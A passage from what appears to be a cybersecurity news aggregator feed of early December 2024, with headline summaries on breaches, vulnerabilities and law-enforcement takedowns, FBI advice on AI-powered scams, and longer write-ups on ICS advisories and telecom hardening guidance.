- AI-Generated Audio (Vocal Cloning): Another alarming trend is the use of AI to clone voices, which allows scammers to impersonate well-known figures or even close family members. By mimicking someone's voice, criminals can trick victims into transferring money or sharing sensitive information. Scammers may create short audio clips of a loved one's voice to make it seem as though the victim is being contacted in a crisis, prompting immediate financial assistance or a ransom demand. AI-generated audio can also be used to impersonate bank officials or other trusted sources in order to gain access to sensitive accounts or convince victims to provide personal information.
- AI-Generated Videos: Criminals are also using AI to create fake videos that enhance the believability of their scams. These videos might feature public figures or fictitious personas to make the fraud seem more credible. Fraudsters have used AI to create videos that appear to be from company executives, law enforcement officials, or other authority figures. These videos are often used in schemes involving fake job offers or investment fraud. Private communications may include AI-generated videos of someone the victim believes to be real, further bolstering the illusion that they are communicating with a legitimate person.

Tips to Protect Yourself from AI-Driven Scams
As AI-generated content becomes more advanced, it's crucial to remain vigilant and aware of the warning signs. The FBI offers several tips to help people protect themselves from falling victim to AI-driven fraud:
- Create a Secret Word or Phrase: Establish a secret code with family members to verify identities in case of a crisis. This simple step can help prevent scams that involve impersonating loved ones.
- Look for Imperfections: AI-generated images and videos, although realistic, often contain subtle flaws. Watch for distorted faces, unrealistic eyes or teeth, strange hand or foot shapes, and irregular shadows. Similarly, listen for any odd pauses or mismatched tones in audio clips.
- Limit Your Online Presence: Consider minimizing the amount of personal content you post online. Make your social media accounts private and only accept friend requests from people you know. Limiting access to your images and voice can make it harder for criminals to use AI tools to create fraudulent identities.
- Verify Unsolicited Calls or Messages: If you receive a call or message asking for money or personal information, do not engage immediately. Instead, hang up and research the contact through official channels. Always call back using a trusted phone number from a website or official documentation.
- Don't Share Sensitive Information: Never share sensitive information with people you have only met online or over the phone. This includes personal details, passwords, or financial information.
- Never Send Money to Strangers: Be cautious when asked to send money, gift cards, or cryptocurrency to people you don't know, especially if you've only met them online or over the phone.

What to Do if You Fall Victim to a Fraud Scheme
If you suspect that you have been scammed, it's important to act quickly. The FBI advises victims to file a report with the Internet Crime Complaint Center (IC3) at www.ic3.gov. When submitting a report, include as much information as possible, such as:
- Identifying details about the scammer, such as name, phone number, email, and physical address.
- Financial transaction information, including dates, payment methods, amounts, and account numbers.
- A description of your interaction with the scammer, including how contact was made, the type of request, and any other relevant details.
By staying informed and cautious, you can reduce your risk of falling victim to these increasingly advanced AI-powered fraud schemes.
by The Cyber Express
2024-12-05 04:59:17
Networking Basics 101 - Day 1
It's been so long since I blogged and I believe it was the right time to brush up on a few basics. So, here's "Networking", for you!

So what is Networking in layman's terms? Simple. Connecting multiple devices allows them to exchange information and resources. Today, we shall look at some of the basic network types available in today's day and age.

Did you know, everything is online nowadays? We expect all our devices such as mobile phones, tablets, laptops, and desktop computers always to be connected to the global internet. We use this network to interact with our friends and shops, share pictures and experiences, and learn. The internet has become such a part of everyday life that we almost take it for granted.

So, who owns the Internet? Us! You disagree? Let me tell you, the Internet is nothing but a collection of interconnected networks worldwide. Technically, we "all (our devices)" cooperate to exchange information and resources. Isn't it amazing? Everything is online, like social media, online courses, etc. All of these destinations are connected to the local network that sends and receives information through the Internet.

What are Local Networks? In simple terms, it is a collection of devices that are connected to a single physical network connection. Like the ones at home, or office.

That's it for today. I know that it was not much, but I was just covering some of the basic stuff, which will be useful to some of the laymen out there. Day 2, I will be covering some more topics, with more examples. I believe in the "you learn, I learn" motto, so if you have any feedback or suggestions for me, do let me know in the comments, and I will try and correct it in the coming days. Ciao!
by HACKLIDO
2024-12-05 00:00:00
BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure
BlueAlpha, a Russian cyber group, uses Cloudflare Tunnels to deploy GammaDrop malware, escalating challenges in targeting Ukrainian entities.
by Recorded Future
2024-12-05 00:00:00
On-Demand BOF
From the team that brought you COFF Loader, CS-Situational-Awareness-BOF, CS-Remote-OPs-BOF, and numerous blogs on BOFs, we are excited to release our first on-demand class: Building BOFs. TrustedSec has had private…
by TrustedSec
2024-12-04 22:53:00
Russia-Linked Turla Exploits Pakistani Hackers' Servers to Target Afghan and Indian Entities
The Russia-linked advanced persistent threat (APT) group known as Turla has been linked to a previously undocumented campaign that involved infiltrating the command-and-control (C2) servers of a Pakistan-based hacking group named Storm-0156 to conduct its own operations since 2022. The activity, first observed in December 2022, is the latest instance of the nation-state adversary "embedding
by The Hacker News
2024-12-04 22:52:40
Onapsis Expands Code Security Capabilities to Accelerate and De-Risk SAP BTP Development Projects
by Dark Reading
2024-12-04 22:44:54
Wyden and Schmitt Call for Investigation of Pentagon's Phone Systems
by Dark Reading
2024-12-04 22:06:31
CISA Issues Guidance to Telecom Sector on Salt Typhoon Threat
Individuals concerned about the privacy of their communications should consider using encrypted messaging apps and encrypted voice communications, CISA and FBI officials say.
by Dark Reading
2024-12-04 22:00:36
It's the Senate's last chance to pass the PRESS Act
The PRESS Act, which would protect a journalist's sources, gained unanimous bipartisan support when passed by the House in January. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 21:59:39
Black Basta ransomware gang hit BT Group
BT Group (formerly British Telecom)'s Conferencing division shut down some of its servers following a Black Basta ransomware attack. British multinational telecommunications holding company BT Group (formerly British Telecom) announced it has shut down some of its servers following a Black Basta ransomware attack. "We identified an attempt to compromise our BT Conferencing platform. This […]
by Security Affairs
2024-12-04 21:56:58
OpenAI inks deal to upgrade Anduril's anti-drone tech
OpenAI plans to team up with Anduril, the defense startup, to supply its AI tech to systems the U.S. military uses to counter drone attacks. The Wall Street Journal reports that Anduril will incorporate OpenAI tech into software that assesses and tracks unmanned aircraft. Anduril tells the publication that OpenAI's models could improve the accuracy […]
by TechCrunch
2024-12-04 21:03:52
API Security in Open Banking: Balancing Innovation with Risk Management
Any technological innovation comes with security risks, and open banking is no exception. Open banking relies on APIs…
by Hackread
2024-12-04 20:47:46
Russian FSB Hackers Breach Pakistani APT Storm-0156
Parasitic advanced persistent threat (APT) Secret Blizzard accessed another APT's infrastructure, and stole the same kinds of info it targets in South Asian government and military victims.
by Dark Reading
2024-12-04 20:47:45
Sharing your Max password? That's about to get more difficult
Like other streaming services, Discovery Max will give you the chance to officially add someone to your account.
by ZDNET Security
2024-12-04 20:47:06
Veeam Urges Updates After Discovering Critical Vulnerability
The vulnerability affects certain versions of the Veeam Service Provider Console that can only be fixed by updating with the latest patch.
by Dark Reading
2024-12-04 20:14:04
Authorities shut down Crimenetwork, Germany's largest crime marketplace
Germany's largest crime marketplace, Crimenetwork, has been shut down, and an administrator has been arrested. German authorities announced the takedown of Crimenetwork, the largest German-speaking underground marketplace. Since 2012, Crimenetwork facilitated the sale of illegal goods and services, including drugs, forged documents, hacking tools, and stolen data. The platform served as a hub for cybercriminals […]
by Security Affairs
2024-12-04 20:06:00
Pegasus Spyware Infections Proliferate Across iOS, Android Devices
The notorious spyware from Israel's NSO Group has been found targeting journalists, government officials, and corporate executives in multiple variants discovered in a threat scan of 2,500 mobile phones.
by Dark Reading
2024-12-04 20:05:08
Open Source Software Powers 96% of Modern Applications, New Study Finds
The Linux Foundation's Census III report reveals critical dependencies and growing security concerns in open source software.
by ITPro Today
2024-12-04 19:44:43
Microsoft says having a TPM is "non-negotiable" for Windows 11
Microsoft made it abundantly clear this week that Windows 10 users won't be able to upgrade to Windows 11 unless their systems come with TPM 2.0 support, stating it's a "non-negotiable" requirement. [...]
by BleepingComputer
2024-12-04 19:30:49
Are We on the Brink of Saying Goodbye to Passwords?
Explore the transition from passwords to a passwordless future: enhanced security, convenience, and cutting-edge innovations in biometrics and…
by Hackread
2024-12-04 18:44:36
Wallets vs. Passkeys: What CISOs Need To Know
For long-term success, CISOs must strategically plan to integrate wallets and passkeys into their organizations.
by ITPro Today
2024-12-04 18:33:34
Veeam Warns of Critical Vulnerability in Service Provider Console
Veeam releases patches for two vulnerabilities in Service Provider Console, including a critical-severity remote code execution bug. The post Veeam Warns of Critical Vulnerability in Service Provider Console appeared first on SecurityWeek.
by SecurityWeek
2024-12-04 18:16:52
Critical Veeam Vulnerabilities Allow Remote Code Execution – Update Now
SUMMARY Veeam, a leading provider of backup, recovery, and data management solutions, has issued urgent security updates to…
by Hackread
2024-12-04 18:00:27
White House: Salt Typhoon hacked telcos in dozens of countries
Chinese state hackers, known as Salt Typhoon, have breached telecommunications companies in dozens of countries, President Biden's deputy national security adviser Anne Neuberger said today. [...]
by BleepingComputer
2024-12-04 17:50:00
Europol Dismantles Criminal Messaging Service MATRIX in Major Global Takedown
Europol on Tuesday announced the takedown of an invite-only encrypted messaging service called MATRIX that's created by criminals for criminal purposes. The joint operation, conducted by French and Dutch authorities under the moniker Passionflower, comes in the aftermath of an investigation that was launched in 2021 after the messaging service was discovered on the phone of a criminal convicted
by The Hacker News
2024-12-04 17:33:00
Shared digital gateway was source of three NHS ransomware attacks
by ComputerWeekly
2024-12-04 17:22:14
FBI, CISA urge Americans to use secure messaging apps in wake of massive cyberattack
Your unencrypted RCS messages between iPhones and Android devices can be spied on by foreign attackers. Here's how to protect yourself.
by ZDNET Security
2024-12-04 17:21:24
Senators say US military is failing to secure its phones from foreign spies
Senators Ron Wyden and Eric Schmitt are demanding that the Department of Defense do more to secure its telecommunications.
by TechCrunch
2024-12-04 17:20:00
7 PAM Best Practices to Secure Hybrid and Multi-Cloud Environments
Are you using the cloud or thinking about transitioning? Undoubtedly, multi-cloud and hybrid environments offer numerous benefits for organizations. However, the cloud's flexibility, scalability, and efficiency come with significant risk — an expanded attack surface. The decentralization that comes with utilizing multi-cloud environments can also lead to limited visibility into user activity and
by The Hacker News
2024-12-04 17:00:00
A New Phone Scanner That Detects Spyware Has Already Found 7 Pegasus Infections
The mobile device security firm iVerify has been offering a tool since May that makes spyware scanning accessible to anyone—and it's already turning up victims.
by WIRED Security News
2024-12-04 16:57:21
Senators Warn the Pentagon: Get a Handle on China's Telecom Hacking
In a letter to the Department of Defense, senators Ron Wyden and Eric Schmitt are calling for an investigation into fallout from the Salt Typhoon espionage campaign.
by WIRED Security News
2024-12-04 16:47:25
NHS Ransomware Attack: Russian INC Ransom Gang Steals Patient Data
INC Ransom, a Russian-language ransomware group, has claimed responsibility for the ransomware attack on two NHS hospitals.
by Hackread
2024-12-04 16:45:47
At least 8 US companies hit in telecom attack spree, officials say
A deputy national security advisor warned that the China-affiliated Salt Typhoon attack spree potentially infiltrated more telecom companies and the threat group still has network access.
by Cybersecurity Dive
2024-12-04 16:32:38
Preparing for 2025 Cybersecurity Warnings
2024 has been a defining year for cybersecurity. The Change Healthcare breach exposed 100+ million sensitive records, while the Crowdstrike incident affected 8.5 million systems and cost Fortune 500 companies $5.4 billion. Ransomware incidents, like the Ticketmaster breach, have also increased, while the Transport for London and NHS hacks revealed critical vulnerabilities in governmental organisations. […] The post Preparing for 2025 Cybersecurity Warnings appeared first on IT Security Guru.
by IT Security Guru
2024-12-04 16:27:22
Supply Chain Attack Hits Solana Core Library, Wallets at Risk
A supply chain attack has compromised versions 1.95.6 and 1.95.7 of the @solana/web3.js library, a critical JavaScript tool widely used for building Solana blockchain applications. The library, which sees over 350,000 weekly downloads on npm, contained malicious code that could steal private keys, posing significant risks to developers and end-users. The issue came to light … The post Supply Chain Attack Hits Solana Core Library, Wallets at Risk appeared first on CyberInsider.
by Cyber Insider
2024-12-04 16:26:51
Poor mobile security practices rife at SMEs, CyberSmart survey finds
New research conducted by CyberSmart, a leading provider of SME security solutions, indicates that mobile cybersecurity incidents at small businesses are widespread. The research, conducted by OnePoll in Autumn 2024, which polled 250 small-medium enterprise (SME) business owners or leaders in the UK, found that over a third (35%) of small business employees or owners […] The post Poor mobile security practices rife at SMEs, CyberSmart survey finds appeared first on IT Security Guru.
by IT Security Guru
2024-12-04 16:09:40
Crypto's rising value likely to bring new wave of scams
The value of cryptocurrencies is going through the roof, so the scammers are even more interested in your funds.
by Malwarebytes Labs
2024-12-04 16:05:00
CISA, FBI urge Americans to use encrypted messaging apps to combat Chinese telco hackers
U.S. government officials urged Americans to use encrypted messaging apps to avoid having their communications tapped by Chinese spies.
by TechCrunch
2024-12-04 16:00:46
UnitedHealthcare CEO Brian Thompson shot and killed in New York
Brian Thompson, the CEO of UnitedHealthcare, was fatally shot in Midtown Manhattan early Wednesday morning while walking toward the New York Hilton Midtown for his company's annual investor conference. According to emerging media reports, Thompson was fired on from roughly 20 feet away by a masked gunman, who appeared to be waiting for Thompson, and […]
by TechCrunch
2024-12-04 16:00:00
How to Plan a New (and Improved!) Password Policy for Real-World Security Challenges
Many organizations struggle with password policies that look strong on paper but fail in practice because they're too rigid to follow, too vague to enforce, or disconnected from real security needs. Some are so tedious and complex that employees post passwords on sticky notes under keyboards, monitors, or desk drawers. Others set rules so loose they may as well not exist. And many simply copy
by The Hacker News
2024-12-04 15:39:10
She Was a Russian Socialite and Influencer. Cops Say She's a Crypto Laundering Kingpin
Western authorities say they've identified a network that found a new way to clean drug gangs' dirty cash. WIRED gained exclusive access to the investigation.
by WIRED Security News
2024-12-04 15:38:00
Phishing attacks surge over 600% in the buildup to Black Friday
Black Friday and Cyber Monday are prime targets for cyber-attacks, as consumer spending rises and threat actors flock to take advantage. Darktrace analysis reveals a surge in retail cyber scams at the opening of the peak 2024 shopping period, and the top brands that scammers love to impersonate. Plus, don't forget to check out our top tips for holiday-proofing your SOC before you clock off for the festive season.
by Darktrace
2024-12-04 15:37:15
FBI shares tips on how to tackle AI-powered fraud schemes
The FBI warns that scammers are increasingly using artificial intelligence to improve the quality and effectiveness of their online fraud schemes, ranging from romance and investment scams to job hiring schemes. [...]
by BleepingComputer
2024-12-04 15:18:10
UK disrupts Russian money laundering networks used by ransomware
A law enforcement operation led by the United Kingdom's National Crime Agency (NCA) has disrupted two Russian money laundering networks working with criminals worldwide, including ransomware gangs. [...]
by BleepingComputer
2024-12-04 15:18:00
Researchers Uncover Backdoor in Solana's Popular Web3.js npm Library
Cybersecurity researchers are alerting to a software supply chain attack targeting the popular @solana/web3.js npm library that involved pushing two malicious versions capable of harvesting users' private keys with an aim to drain their cryptocurrency wallets. The attack has been detected in versions 1.95.6 and 1.95.7. Both these versions are no longer available for download from the npm
by The Hacker News
2024-12-04 15:11:08
Veeam addressed critical Service Provider Console (VSPC) bug
Veeam addressed a critical vulnerability in Service Provider Console (VSPC) that could allow remote attackers to execute arbitrary code. Veeam released security updates for a critical vulnerability, tracked as CVE-2024-42448 (CVSS score of 9.9) impacting Service Provider Console. Successful exploitation of the flaw can potentially lead to remote code execution on vulnerable installs. Veeam Service […]
by Security Affairs
2024-12-04 15:03:35
Bypassing WAFs with the phantom $Version cookie
HTTP cookies often control critical website features, but their long and convoluted history exposes them to parser discrepancy vulnerabilities. In this post, I'll explore some dangerous, lesser-known
by PortSwigger Research
2024-12-04 15:00:00
Navigating the Changing Landscape of Cybersecurity Regulations
The evolving regulatory environment presents both challenges and opportunities for businesses.
by Dark Reading
2024-12-04 14:40:21
Ransomware hackers target NHS hospitals with new cyberattacks
Two NHS trusts in England have been hacked in recent weeks, the latest attacks to hit the national health service.
by TechCrunch
2024-12-04 14:25:33
Vulnerabilities in ICS: A Detailed Analysis of Recent Security Advisories and Threats
Overview
The recent Weekly Industrial Control System Vulnerability Intelligence Report from Cyble Research & Intelligence Labs (CRIL) covers the vulnerabilities disclosed by the Cybersecurity and Infrastructure Security Agency (CISA) from November 26, 2024, to December 02, 2024. The report sheds light on online threats, especially vulnerabilities affecting critical systems such as those from Schneider Electric and Hitachi Energy, two of the most prominent vendors in the ICS sector. During the report's timeframe, CISA issued five major security advisories, focusing on 12 vulnerabilities that impact a wide range of ICS products. These vulnerabilities have been identified in devices and systems from key vendors, including Schneider Electric and Hitachi Energy. The vulnerabilities identified in these systems are critical to address due to their potential to expose vital infrastructures to cyberattacks.
Schneider Electric: A Major Focus for ICS Vulnerabilities
Schneider Electric, a leading vendor of control systems, was prominently featured in the advisories due to the numerous vulnerabilities impacting their devices. These vulnerabilities range from issues with weak password recovery mechanisms to the use of hard-coded credentials, both of which pose a risk to the integrity of ICS devices. Among the affected products is the PM5560 series, which includes multiple versions susceptible to vulnerabilities like weak password recovery mechanisms for forgotten passwords (CVE-2021-22763). This flaw, coupled with improper authentication (CVE-2021-22764), increases the potential for unauthorized access. Such vulnerabilities undermine the effectiveness of ICS security, allowing attackers to potentially take control over critical systems like actuators, sensors, and power supplies.
One particularly concerning vulnerability (CVE-2023-6408) affects the Modicon M340 CPU and other related Schneider Electric products. This vulnerability arises from improper message integrity enforcement during transmission across communication channels, which could allow attackers to manipulate the integrity of communications between devices, creating openings for man-in-the-middle attacks. The high-severity nature of this vulnerability highlights the ongoing need for organizations to implement stronger security practices, including effective patch management and encryption protocols. Additionally, Schneider Electric's use of hard-coded credentials (CVE-2023-6409) in its devices presents a high-risk issue, making it easier for attackers to gain access to systems. This particular vulnerability is found in several product lines, including the Modicon M580 and Modicon M340 CPUs, which are integral to many ICS operations. These devices are widely used in critical sectors such as energy and manufacturing.
Hitachi Energy: Security Flaws in SCADA and Control Systems
Another major player in the ICS sector, Hitachi Energy, also faced critical security challenges during the same reporting period. The vulnerabilities affecting Hitachi's MicroSCADA Pro/X SYS600 system are especially concerning because they affect key operational components within control systems and supervisory control and data acquisition (SCADA) environments. These vulnerabilities could allow attackers to bypass authentication (CVE-2024-3982), potentially gaining unauthorized access to control systems that are vital for managing electricity grids and other industrial processes. Additionally, path traversal vulnerabilities (CVE-2024-3980) were identified, which could allow an attacker to manipulate file paths within the system, gaining unauthorized access to sensitive files.
These vulnerabilities are classified as high and critical risks, as they could be exploited by attackers to infiltrate ICS systems, causing online disruption to operations. A notable vulnerability in Hitachi Energy’s systems is the authentication bypass by the capture-replay flaw (CVE-2024-3982), which allows attackers to bypass authentication mechanisms by replaying captured credentials. Given the high-security requirements of control systems like SCADA, the existence of this vulnerability calls for immediate attention from organizations to ensure these critical systems remain secure. The MicroSCADA Pro/X SYS600 system is also affected by a missing authentication for critical functions (CVE-2024-7940) vulnerability. This flaw could enable attackers to exploit critical functions within the system without proper authentication, allowing them to manipulate system settings or gain unauthorized access to sensitive data.
The Severity of ICS Vulnerabilities
The vulnerabilities analyzed in the CRIL report show that the majority of the vulnerabilities in ICS systems fall under high severity. This highlights the critical need for organizations operating ICS devices to adopt proactive cybersecurity measures. Weak passwords, improper authentication, and hard-coded credentials are among the most common issues found across various ICS products. Addressing these vulnerabilities requires rigorous patch management practices, including regular updates and configuration checks. The vulnerabilities disclosed by CISA and highlighted in the report are particularly important as they impact critical infrastructure sectors such as energy, critical manufacturing, and communications. Schneider Electric and Hitachi Energy alone account for a notable portion of the vulnerabilities in the ICS space, underlining the need for greater focus on security within the industrial sector.
Impact on Critical Infrastructure Sectors
A sector-wise analysis of the vulnerabilities reveals that Critical Manufacturing accounts for the largest portion of vulnerabilities, with an overwhelming 83.3% of the cases. This is due to the expansive operations and critical nature of manufacturing processes that rely heavily on ICS. In contrast, the Energy sector, which includes power grids and electrical infrastructure, accounts for 8.3% of the reported vulnerabilities, while the Wastewater Systems sector is also impacted with a similar share. The Commercial Facilities sector reports the smallest share, with only 0.8% of the vulnerabilities. This distribution denotes the varied risk levels across critical infrastructure sectors and emphasizes the importance of prioritizing cybersecurity efforts, particularly in manufacturing and energy, where ICS vulnerabilities could lead to more severe consequences.
Mitigation Strategies and Recommendations
Here are some of the best practices recommended to mitigate potential risks:
- It is essential to regularly update systems and apply patches as soon as they are released. Many vulnerabilities in ICS are a result of outdated software or firmware, which can be addressed by keeping systems up to date.
- Implementing a zero-trust security model is crucial in preventing unauthorized access. This involves treating every request for access as if it originates from an untrusted source, requiring strict verification before granting access.
- By segmenting networks, organizations can limit the ability of attackers to move laterally across systems, thus reducing the risk of widespread damage.
- Strengthening authentication protocols, such as using multi-factor authentication (MFA), is critical to reducing the likelihood of unauthorized access to ICS devices.
- Continuous security assessments through vulnerability scans, penetration testing, and audits help identify potential security gaps in ICS before they can be exploited by attackers.
- Organizations should invest in cybersecurity training programs for employees to ensure they are aware of the risks posed by phishing, social engineering, and other attack methods.
Conclusion
The vulnerabilities in ICS highlighted in the latest report from CISA, along with those analyzed by Cyble Research & Intelligence Labs, highlight the increasing risks faced by critical infrastructure sectors. With vulnerabilities in high-severity products from vendors like Schneider Electric and Hitachi Energy, it is important that organizations address these potential threats before they can compromise sensitive information. By implementing security measures, including effective patch management, strong authentication protocols, and comprehensive training programs, organizations can better protect their ICS systems from cybersecurity risks. The post Vulnerabilities in ICS: A Detailed Analysis of Recent Security Advisories and Threats appeared first on Cyble.
by CYBLE
2024-12-04 14:25:23
New Android Malware DroidBot Targets Banking Users in Europe
Cybersecurity researchers from Cleafy have identified a sophisticated new Android Remote Access Trojan (RAT) called DroidBot. First detected in late October 2024, with traces of activity dating back to June, DroidBot is a Malware-as-a-Service (MaaS) operation, providing advanced tools for surveillance and fraud targeting financial and governmental institutions across Europe. Cleafy’s Threat Intelligence and Research … The post New Android Malware DroidBot Targets Banking Users in Europe appeared first on CyberInsider.
by Cyber Insider
2024-12-04 14:22:56
Upgrade your Sophos Firewall to v21 today
Get the most from your Sophos Firewall.
by Sophos News
2024-12-04 14:12:31
Australia’s ACSC and ASD Team Up with CISA, NSA, FBI, and International Allies to Protect Communications Infrastructure
Overview
A coalition of cybersecurity agencies, including the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), Australia’s Australian Signals Directorate (ASD), the Australian Cyber Security Centre (ACSC), as well as counterparts from Canada and New Zealand, has issued hardening guidance to strengthen communications infrastructure against cyber espionage and other malicious cyber activities. This hardening guidance focuses on visibility enhancements and hardening practices for network devices. It aims to help engineers and defenders safeguard their systems from the growing threats posed by China-affiliated threat actors. The latest intelligence reports reveal that Chinese hackers have compromised networks of major telecommunications providers globally, conducting extensive cyber espionage campaigns. These groups have been targeting vulnerabilities in telecommunications networks, gaining unauthorized access to sensitive data. This activity aligns with known weaknesses in existing network infrastructure and highlights the urgent need for organizations to address security gaps. The agencies involved in this effort, including the ASD and the ACSC, emphasize that while the tactics used by these threat actors are not novel, their success stems from exploiting well-established vulnerabilities in communications infrastructure. The newly issued hardening guidance, therefore, provides actionable steps for network engineers and defenders to strengthen visibility, detect malicious activities, and harden systems against future exploitation.
Hardening Guidance: Enhancing Visibility in Communications Networks
One key strategy in this guidance is to improve visibility across communication networks. For organizations to effectively monitor, detect, and respond to cyber threats, they must have thorough insight into network traffic, user behavior, and overall data flow. High visibility enables swift identification of anomalies that may indicate a cyber intrusion, allowing defenders to take immediate action.
Monitoring Network Configurations and Changes
Network engineers are advised to closely monitor configuration changes in critical network devices, such as routers, switches, and firewalls. Any alterations outside the formal change management process should raise red flags. Additionally, regular audits and monitoring for unusual activities, such as unauthorized changes to routes or protocols, can help detect malicious intrusions early.
Centralized Configuration Management
The guidance recommends centralizing configurations and storing them in a secure, centralized location. This prevents devices from becoming the sole source of truth for their own configurations, which could be manipulated in the event of a breach. Network engineers should also implement strong network flow monitoring solutions to gain insights into the ingress and egress points of data across the network.
Monitoring Accounts and Logging
A proactive approach to monitoring user accounts and logins is also essential for mitigating threats. Monitoring anomalies in user and service account activity—such as abnormal login times, failed login attempts, or logins from unexpected locations—can help identify malicious actors who have gained unauthorized access to the network. Organizations should also ensure that logging mechanisms are vigorous, secure, and centralized. Logs should be encrypted in transit and stored off-site to prevent tampering. Using Security Information and Event Management (SIEM) systems is encouraged to help analyze logs and correlate data from various devices for rapid incident detection.
Hardening Network Systems
Beyond improving visibility, securing the underlying network systems through hardening is a critical defense strategy. Hardening aims to reduce vulnerabilities by ensuring that network devices and protocols are securely configured to minimize the attack surface. The collaboration between CISA, ACSC, and other agencies has provided valuable hardening guidance that organizations can apply to their communications infrastructure.
Isolated Management Networks
One of the most critical recommendations in the guide is the use of out-of-band management networks. By ensuring that network infrastructure devices can only be managed from physically separate, trusted networks, organizations can prevent the lateral movement of hackers within their systems. This isolation limits the potential impact of a breach, as attackers cannot easily move between devices on the network once one device has been compromised.
Segmentation and Access Control
Segmentation of networks into isolated zones, such as using Virtual Local Area Networks (VLANs) and private VLANs (PVLANs), helps protect critical systems and restricts access to sensitive data. Access Control Lists (ACLs) should be configured with a default-deny policy to control both inbound and outbound traffic, ensuring that only authorized connections are allowed.
Securing Virtual Private Networks (VPNs)
The guidance stresses the importance of securing VPN gateways by limiting their exposure to the internet and enforcing strong cryptographic protocols for key exchange and data encryption. VPNs should be configured to only allow strong authentication methods, and unused cryptographic algorithms should be disabled to reduce the risk of exploitation.
Proactive Authentication and Account Management
In addition to securing network devices, organizations should focus on improving authentication methods to ensure that only authorized users can access their networks. Implementing phishing-resistant multi-factor authentication (MFA) for all users, especially those with administrative privileges, is one of the primary strategies to prevent unauthorized access. The guidance also emphasizes the importance of strong password policies, including the use of secure hashing algorithms and the requirement to change default passwords immediately upon deployment. Additionally, organizations should regularly review user accounts to ensure that inactive or unnecessary accounts are removed, and all accounts are assigned the minimum necessary permissions.
Conclusion
Adopting a "secure by design" approach is crucial for software manufacturers to enhance the security of their products and reduce the need for customers to manually implement hardening measures. As cyber threats, especially Chinese threat actors, continue to target global organizations, collaboration between international agencies like CISA, ACSC, and other stakeholders is important to protect global communications infrastructure. Australia's leadership, through agencies such as the ASD and ACSC, plays an important role in fighting cybercrime. By focusing on hardening guidance, improving visibility, and working together internationally, organizations can strengthen their security posture, mitigate vulnerabilities, and contribute to the collective global effort to protect digital life. The post Australia’s ACSC and ASD Team Up with CISA, NSA, FBI, and International Allies to Protect Communications Infrastructure appeared first on Cyble.
by CYBLE
2024-12-04 14:11:12
FBI: Criminals Exploit Generative AI for Sophisticated Fraud Schemes
The FBI’s Internet Crime Complaint Center (IC3) has issued a public service announcement highlighting the growing use of generative artificial intelligence (AI) by criminals to enhance the scale, believability, and reach of fraudulent activities. These AI tools, designed to create realistic synthetic content, are being weaponized for schemes involving social engineering, financial fraud, identity theft, … The post FBI: Criminals Exploit Generative AI for Sophisticated Fraud Schemes appeared first on CyberInsider.
by Cyber Insider
2024-12-04 14:08:45
U.S. Offered $10M for Hacker Just Arrested by Russia
In January 2022, KrebsOnSecurity identified a Russian man named Mikhail Matveev as "Wazawaka," a cybercriminal who was deeply involved in the formation and operation of multiple ransomware groups. The U.S. government indicted Matveev as a top ransomware purveyor a year later, offering $10 million for information leading to his arrest. Last week, the Russian government reportedly arrested Matveev and charged him with creating malware used to extort companies.
by Krebs on Security
2024-12-04 14:01:11
Digital Certificates With Shorter Lifespans Reduce Security Vulnerabilities
Proposals from Google and Apple drastically reduce the life cycle of certificates, which should mean more oversight — and hopefully better control.
by Dark Reading
2024-12-04 14:00:23
Business leaders among Pegasus spyware victims, says security firm
The mobile security company said it detected Pegasus spyware attacks on seven iPhone owners, including government officials and a business leader.
by TechCrunch
2024-12-04 14:00:00
Cloud threat report: Possible trend in cloud credential “oversaturation”
For years now, the dark web has built and maintained its own evolving economy, supported by the acquisition and sales of stolen data, user login credentials and business IP. But much like any market today, the dark web economy is subject to supply and demand. A recent X-Force Cloud Threat Landscape Report has shed light […] The post Cloud threat report: Possible trend in cloud credential “oversaturation” appeared first on Security Intelligence.
by Security Intelligence
2024-12-04 14:00:00
Linux Foundation report highlights the true state of open source libraries in production apps
There are many metrics to track the prevalence of open source components, such as GitHub stars and downloads, but they don’t paint the full picture of how they’re being used in production codebases. Census III of Free and Open Source Software: Application Libraries leans on more than 12 million data points from software composition analysis […]
by TechCrunch
2024-12-04 13:00:00
Tuskira unifies and optimizes disparate cybersecurity tools
Cyberattacks are on the rise, and the victims are high-profile. According to a KPMG survey, close to half of companies with $1 billion or more in annual revenue recently suffered a security breach. Surprisingly, an overabundance of security tools may be contributing to the problem. In a separate poll, 43% of businesses said their teams […]
by TechCrunch
2024-12-04 12:42:41
Your team’s next TTX (probably) isn’t realistic enough to prep for attacks. Here's why
We’ve seen how traditional TTXs create a loop of rehearsed scenarios and safe assumptions, leaving organizations vulnerable to threats that don’t play by the rules. Enter Crisis Control…
by Hack The Box Blog
2024-12-04 12:41:20
From Phishing to Passwords: How Azercell is Educating Seniors About Cyber Threats
Azercell, the leading mobile operator in Azerbaijan, is offering cybersecurity training to its customers, particularly the elderly. As part of its ongoing efforts, Azercell conducted cybersecurity training for residents of a social service institution for the elderly. The training aimed to equip this senior generation with the knowledge and tools necessary to understand digital life and how to protect themselves. The Azercell cybersecurity training was conducted by experts from Azercell's Information Security Department. The training sessions focused on educating the participants about the growing threat of cyber fraud, phishing attacks, and the various methods online fraudsters use to deceive and exploit individuals. As part of the program, attendees were taught practical strategies for protecting their personal data, raising awareness about the importance of being cautious while engaging in online activities.
Key Highlights of the Azercell Cybersecurity Training
One of the key elements of the "Azercell security training" was its focus on real-world scenarios, helping the elderly participants identify common online scams and cyber threats. The training also covered modern cyber-attack methods, ensuring that the senior citizens could recognize and avoid potential dangers in their digital interactions. The importance of strong passwords, the risks of sharing sensitive information on social media, and how to verify the authenticity of emails and websites were among the critical topics addressed during the session. An important part of the training program was dedicated to an interactive Q&A session, where attendees had the opportunity to ask specific questions and receive personalized advice on their concerns. This segment allowed the elderly participants to clarify doubts, ensuring that they left the session feeling more confident in their ability to protect themselves online.
In addition to the informative training, Azercell volunteers, known as "Azercell Könüllüləri," participated actively in the event. The volunteers engaged with the attendees, offering additional support and distributing thoughtful gifts to the participants. This added a personal touch to the event, making it not only educational but also enjoyable for the elderly citizens. Azercell’s initiative is part of the company’s broader efforts to promote digital literacy across various demographics, with a special focus on vulnerable groups such as the elderly. By organizing these "Azercell training for cybersecurity" sessions, the company is working towards building a safer and more informed digital community. These initiatives reflect Azercell’s responsibility to protect its customers and contribute to a safer online environment for everyone, regardless of their age or technological experience.
CISA’s Cybersecurity Training for Diverse Groups
